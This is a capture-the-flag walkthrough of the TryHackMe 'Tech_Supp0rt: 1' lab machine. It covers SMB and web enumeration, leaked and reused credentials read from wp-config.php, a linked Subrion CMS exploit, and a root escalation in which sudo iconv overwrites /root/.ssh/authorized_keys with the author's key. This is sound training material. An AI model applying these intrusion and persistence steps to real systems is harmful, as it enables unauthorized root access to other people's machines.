Tech_Supp0rt: 1 (Decoding, SubrionCMS, iconv)

First, we need to enumerate using nmap.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1  
╰─➤  nmap -A 10.10.164.236 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-17 21:43 +0630
Nmap scan report for 10.10.164.236
Host is up (0.23s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_  256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h50m51s, deviation: 3h10m29s, median: -52s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2022-04-17T20:43:37+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-04-17T15:13:35
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.62 seconds

SSH, HTTP, SSH ports are open. Let's enumerate smb port first.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1  
╰─➤  smbclient -L '\\10.10.164.236'
Enter WORKGROUP\hnl's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	websvr          Disk      
	IPC$            IPC       IPC Service (TechSupport server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

We can see interesting directory called websvr. And access this smb share and download the file that you see in the share.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1  
╰─➤  smbclient '\\10.10.164.236\websvr' 
Enter WORKGROUP\hnl's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat May 29 13:47:38 2021
  ..                                  D        0  Sat May 29 13:33:47 2021
  enter.txt                           N      273  Sat May 29 13:47:38 2021

		8460484 blocks of size 1024. 5698824 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit

Read the file. You can see some interesting informations.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1  
╰─➤  cat enter.txt 
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->

Decode using cyberchef.

Let's change the enumeration to HTTP. When you browse the ip, you will see apache default webpage. Search sub directory using gobuster.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1  
╰─➤  gobuster -u http://10.10.164.236/ -w /usr/share/wordlists/directory-list-2.3-medium.txt           

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.164.236/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2022/04/17 22:19:00 Starting gobuster
=====================================================
/wordpress (Status: 301)
/test (Status: 301)

http://10.10.164.236/wordpress/ point to you wordpress webpage. Every wordpress site contain wp-admin.php. But the credentails admin:Scam2021 (the previous one) didn't work.

http://10.10.164.236/test/ point to you phishing page.

By looking enter.txt, you will see a directory called /subrion. So, we will browse http://10.10.164.236/subrion. But we found nothing. Request using curl.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1  
╰─➤  curl -v http://10.10.164.236/subrion
*   Trying 10.10.164.236:80...
* TCP_NODELAY set
* Connected to 10.10.164.236 (10.10.164.236) port 80 (#0)
> GET /subrion HTTP/1.1
> Host: 10.10.164.236
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 17 Apr 2022 18:09:59 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Location: http://10.10.164.236/subrion/
< Content-Length: 316
< Content-Type: text/html; charset=iso-8859-1
< 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://10.10.164.236/subrion/">here</a>.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 10.10.164.236 Port 80</address>
</body></html>
* Connection #0 to host 10.10.164.236 left intact

How about robots.txt?

Browse to http://10.10.164.236/subrion/panel/ and login using admin:Scam2021. You will find a dashboard.

The webpage is build with Subrion CMS v 4.2.1. Let's find the exploit on google. Here is poc https://www.exploit-db.com/exploits/49876. Download and exploit it.

You can see the wordpress database configuration on /var/www/html/wordpress.

$ cat /var/www/html/wordpress/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wpdb' );

/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', 'ImAScammerLOL!123!' );

Try ssh on scamsite user. You got successful.

Looking around the system, we will see the user run /usr/bin/iconv with root privileges.

scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

Try to get root shell https://gtfobins.github.io/gtfobins/iconv/. Generate ssh public key on our host and copy to victim's authorized keys.

scamsite@TechSupport:~$ LFILE=/root/.ssh/authorized_keys
scamsite@TechSupport:~$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHmsE/qACwaksUEoBvDE4wFu0/N5eZeNQEX9upOp8Bh4KTZsUcMqo7OSdztZbvkSwwp0S6C3mk9WLioJbQ2dDFC64ZyT/LUAgNZgZkSRZtufQa9lhUgqNYhg/0oT1juH5rGTJhoGa8MROpRhp/LiKXw8g4wOQggrG+xqrnCG84PCcb0bq73XW7XMYN9koLXokwl3GSlX/AkSn3VWgBcnj73IX2eI2yvYSAzckYyWeu9fR6EX/j8Rfj3Z7Tsy0W4iuhHwSGPJHX8yDms9Sx07nQmMGGKW+RmQ6p1dqDt9g/R1L2aXDJLJnZOGzR4ZqdxFpyl3R/R026HXKyeSCSAvaE34GIzBowe6g9K4h/Ewe3zwIBlLW8TGq7L7EBPR2j6d2yYSbniH3GMio88N+vmF4E919gMMlgMqi4fJOhoy/l++4vuBqKAEpGEcywblNLw4YSe59dSBurrFeTNrC3O6CNyO8GyDtQ3wxNOGI7nMe7yOesabNTdz9qDRXdbpyXDwE= hnl@hnl" | sudo /usr/bin/iconv -f 8859_1 -t 8859_1 -o "$LFILE"

Try to login using our private key, we got root.

PreviousOllie (SQLI, Permission)NextHalmet (FTP, Web, Hydra, Container)

Last updated 3 years ago